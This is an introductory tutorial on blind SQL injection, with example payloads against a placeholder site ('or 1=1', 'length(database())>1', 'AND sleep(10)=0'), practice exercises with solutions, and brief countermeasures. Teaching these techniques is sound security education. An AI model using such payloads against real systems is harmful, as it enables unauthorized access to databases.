Exploring Blind SQL Injection

1. Introduction

In this tutorial, we'll explore the concept of blind SQL injection, a type of web application vulnerability that can allow an attacker to manipulate SQL queries and gain unauthorized access to a database.

You will learn:

• The basics of blind SQL injection.
• How to detect and exploit blind SQL injection vulnerabilities.
• Measures to prevent blind SQL injection attacks.

Prerequisites: Basic understanding of SQL and web development concepts.

2. Step-by-Step Guide

Blind SQL Injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. It is called "blind" because we are sending commands to the database without seeing the database output.

A. True and False Statements
Start by sending a true statement (e.g., 1=1) and a false statement (e.g., 1=2) to the database. If the response varies, it's a sign the site may be vulnerable to blind SQL injection.

B. Data Extraction
Once you've identified a potential vulnerability, you can extract data by asking a series of true/false questions via the SQL query.

C. Time Delays
You can also inject queries that cause deliberate delays, observing the response time to infer if a statement is true or false.

D. Countermeasures
Preventing blind SQL injection involves input validation, use of parameterized queries, and limiting database permissions.

3. Code Examples

Please note that these examples are for educational purposes only, and should not be used for malicious activities.

Example 1: Detecting Vulnerability

URL = 'http://site.com/page.php?id=1'
True statement = 'http://site.com/page.php?id=1 or 1=1'
False statement = 'http://site.com/page.php?id=1 or 1=2'

If the page loads correctly for the true statement and gives an error or different output with the false statement, it's a sign of vulnerability.

Example 2: Data Extraction

URL = 'http://site.com/page.php?id=1'
Length of database name = 'http://site.com/page.php?id=1 and length(database())>1'

You can increment the number until the response changes to find the exact length of the database name.

Example 3: Time Delays

URL = 'http://site.com/page.php?id=1'
Time delay = 'http://site.com/page.php?id=1 AND sleep(10)=0'

If the page takes 10 seconds longer to load, the statement is true.

4. Summary

In this tutorial, we've covered the basics of blind SQL injection, how to detect and exploit vulnerabilities, and some countermeasures.

Next, learn more about other types of SQL injection, like time-based and out-of-band injections. Additional resources include:

• OWASP SQL Injection
• PortSwigger SQL Injection

5. Practice Exercises

Exercise 1: Try to detect if the following URL is vulnerable to blind SQL injection: http://site.com/login.php?username=admin

Exercise 2: Extract the length of the database name from a vulnerable site.

Exercise 3: Cause a delay of 5 seconds on a vulnerable site.

Solutions:

1. Compare the responses from http://site.com/login.php?username=admin or 1=1 and http://site.com/login.php?username=admin or 1=2
2. Use http://site.com/login.php?username=admin and length(database())>1, incrementing the number until the response changes.
3. Use http://site.com/login.php?username=admin AND sleep(5)=0 and observe if the page takes 5 seconds longer to load.